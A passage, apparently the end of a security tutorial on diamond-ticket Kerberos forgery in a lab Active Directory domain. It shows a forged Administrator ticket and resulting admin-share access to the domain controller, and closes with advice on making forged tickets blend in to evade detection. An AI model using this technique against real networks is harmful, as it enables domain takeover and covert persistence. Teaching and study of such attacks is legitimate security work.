#0> Client: Administrator @ BORDERGATE.LOCAL
Server: krbtgt/BORDERGATE.LOCAL @ BORDERGATE.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 4/30/2024 18:16:45 (local)
End Time: 5/1/2024 1:00:38 (local)
Renew Time: 5/7/2024 18:00:38 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\Tools>dir \\dc01\C$
Volume in drive \\dc01\C$ has no label.
Volume Serial Number is 343D-F2D0
Directory of \\dc01\C$
08/05/2021 09:20 <DIR> PerfLogs
28/04/2024 10:27 <DIR> Program Files
08/05/2021 10:40 <DIR> Program Files (x86)
28/04/2024 10:21 <DIR> Users
28/04/2024 10:35 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 50,740,531,200 bytes free
In Conclusion
Diamond tickets give an attacker the ability to assume the identity of any user in a domain, whilst being more difficult to detect over traditional golden ticket attacks.In addition, it’s always worth ensuring the tickets being generated blend in with the target environment.